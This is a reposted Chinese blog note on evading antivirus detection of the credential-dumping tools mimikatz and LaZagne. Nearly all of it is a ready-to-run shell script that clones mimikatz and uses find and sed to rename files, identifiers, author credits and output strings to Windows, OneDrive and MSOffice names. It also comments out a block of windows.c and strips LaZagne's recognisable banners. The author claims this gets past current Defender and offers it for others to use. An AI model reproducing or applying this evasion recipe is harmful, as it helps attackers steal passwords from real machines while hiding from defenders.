碼上快樂

相關內容    簡體    繁體

關於mimikatz lazagne免殺方法

本文轉載自   查看原文   2019-11-01 00:22   497 

其實現在的殺軟還是玩的老一套,改改特征字符就能過了,最新的defender能用這個方法過

文章直接從筆記復制出來的,有需要的自己看情況用

git clone https://github.com/gentilkiwi/mimikatz.git lmmg
mv lmmg/mimikatz lmmg/lmmg
find lmmg/ -type f -name '*mimikatz*' | while read FILE ; do
        newfile="$(echo ${FILE} |sed -e 's/mimikatz/windows/g')";
        mv "${FILE}" "${newfile}";
done
find lmmg/ -type f -name '*kiwi*' | while read FILE ; do
        newfile="$(echo ${FILE} |sed -e 's/kiwi/onedrive/g')";
        mv "${FILE}" "${newfile}";
done
find lmmg/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
find lmmg/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'
find lmmg/ -type f -print0 | xargs -0 sed -i 's/Mimikatz/Windows/g'
find lmmg/ -type f -print0 | xargs -0 sed -i 's/DELPY/gweep/g'
find lmmg/ -type f -print0 | xargs -0 sed -i 's/Benjamin/gweeperx/g'
find lmmg/ -type f -print0 | xargs -0 sed -i 's/benjamin@gentilkiwi.com/@gweeperx/g'
find lmmg/ -type f -print0 | xargs -0 sed -i 's/creativecommons/notcommons/g'
find lmmg/ -type f -print0 | xargs -0 sed -i 's/gentilkiwi/MSOffice/g'
find lmmg/ -type f -print0 | xargs -0 sed -i 's/KIWI/ONEDRIVE/g'
find lmmg/ -type f -print0 | xargs -0 sed -i 's/Kiwi/Onedrive/g'
find lmmg/ -type f -print0 | xargs -0 sed -i 's/kiwi/onedrive/g'
find lmmg/ -type f -print0 | xargs -0 sed -i 's/DumpCreds/DumpCred/g'
find lmmg/ -type f -print0 | xargs -0 sed -i 's/logonPasswords/logonPassword/g'
find lmmg/ -type f -print0 | xargs -0 sed -i 's/ArgumentPtr/NotTodayPal/g'
find lmmg/ -type f -print0 | xargs -0 sed -i 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' 

cd ./lmmg/lmmg/
sed -i "0,/#if \!defined(_POWERKATZ)/! {0,/#if \!defined(_POWERKATZ)/ s/#if \!defined(_POWERKATZ)/\/*\r\n#if \!defined(_POWERKATZ)/}" windows.c
sed -i "0,/#endif/! {0,/#endif/! {0,/#endif/ s/#endif/#endif\r\n*\//}}" windows.c

lazagne
find ./Windows/ -type f -name '*lazagne*' | while read FILE ; do
        newfile="$(echo ${FILE} |sed -e 's/lazagne/kmm/g')";
        mv "${FILE}" "${newfile}";
done

find ./Windows/ -type d -name '*lazagne*' | while read FILE ; do
        newfile="$(echo ${FILE} |sed -e 's/lazagne/kmm/g')";
        mv "${FILE}" "${newfile}";
done

find ./Windows/ -type f -name '*LaZagne*' | while read FILE ; do
        newfile="$(echo ${FILE} |sed -e 's/LaZagne/Kmm/g')";
        mv "${FILE}" "${newfile}";
done

find ./Windows/ -type d -name '*LaZagne*' | while read FILE ; do
        newfile="$(echo ${FILE} |sed -e 's/LaZagne/Kmm/g')";
        mv "${FILE}" "${newfile}";
done
find ./Windows/ -type f -name '*laZagne*' | while read FILE ; do
        newfile="$(echo ${FILE} |sed -e 's/laZagne/KMm/g')";
        mv "${FILE}" "${newfile}";
done

find ./Windows/ -type d -name '*laZagne*' | while read FILE ; do
        newfile="$(echo ${FILE} |sed -e 's/laZagne/KMm/g')";
        mv "${FILE}" "${newfile}";
done

find windows/ -type f -print0 | xargs -0 sed -i 's/lazagne/kmm/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/LaZagne/Kmm/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/laZagne/KMm/g'

find windows/ -type f -print0 | xargs -0 sed -i 's/BANG/bg/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/passwords ---------------/vp/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/Password not found/nop/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/=================================================================/ll/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/########## User/lp/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/For more information launch it again with the -v option/jj/g'

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 免殺mimikatz 有源碼免殺之mimikatz mimikatz免殺之基礎源碼 分離免殺mimikatz密碼抓取 初探免殺之路——免殺方法測試 一些免殺方法測試 洪雨綜合360免殺方法心得總結 這篇文章就總結一下關於免殺的方法 ASPX免殺 2019免殺大馬
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM